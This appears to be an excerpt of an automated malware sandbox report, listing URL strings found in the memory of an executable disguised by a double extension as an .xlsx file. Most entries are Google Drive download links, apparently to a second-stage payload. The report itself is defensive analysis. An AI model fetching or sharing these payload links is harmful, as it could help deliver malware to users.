      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/7
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3993352675.00000000074BC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000074B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/;
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.00000000074AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/E
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2757969219.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2575572170.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/G
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2757969219.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198290146.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2575572170.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070445267.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2604318425.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/R
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070445267.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/catig
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/i
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ificate
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/kxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/kxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download2
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/kxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadz
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3677626588.00000000074B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/letagservices-cn.com
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3382677279.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/qf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198290146.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/r
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3677626588.00000000074B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/recaptcha.net.cn
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2757969219.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/t/allowlist
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/tagmanager.com
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731190068.000000000744C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024396004.00000000073C0000.00000004.00001000.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884426323.000000000744D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2758062431.000000000744D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731190068.000000000744C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i#Q9
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i0
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000073F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i3
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198290146.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3382677279.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i8
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2758062431.000000000744D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731190068.000000000744C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i?Q
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69iF
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198290146.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070445267.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69ih
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000073F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69im
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007435000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884426323.000000000744D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2758062431.000000000744D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731190068.000000000744C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69ioQ
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834655419.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861710802.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69iqRIq1CtXsroj69i
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3541195078.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69iqRIq1CtXsroj69i87
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007435000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884426323.000000000744D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69it
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2757969219.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2604318425.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontef
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3993352675.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2757969219.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198290146.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3706467827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834655419.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861710802.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2575572170.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3382677279.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3541195078.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070445267.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3994935047.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3677479359.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2757969219.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198290146.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3382677279.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070445267.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2604318425.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkx
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3706592766.00000000074BC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834777087.00000000074BC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3993352675.00000000074BC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3382677279.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861593384.00000000074BC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEfl
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3677479359.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download)t
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download4T
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2757969219.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198290146.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3382677279.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070445267.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download;o
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloade
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadet
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadid
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadl
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731190068.000000000744C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884426323.0000000007454000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3355352985.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3513923547.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3706467827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834655419.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2575572170.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2420547261.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.00000000074AC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834777087.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3677479359.00000000074AA000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000074AC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224953298.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198125430.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834655419.00000000074AA000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731190068.0000000007454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3384459717.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3382677279.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3352640327.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3993692826.00000000074AC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3706467827.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3706467827.00000000074AA000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3355352985.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3513923547.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3706467827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834655419.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2575572170.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2420547261.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.00000000074AC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834777087.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3677479359.00000000074AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
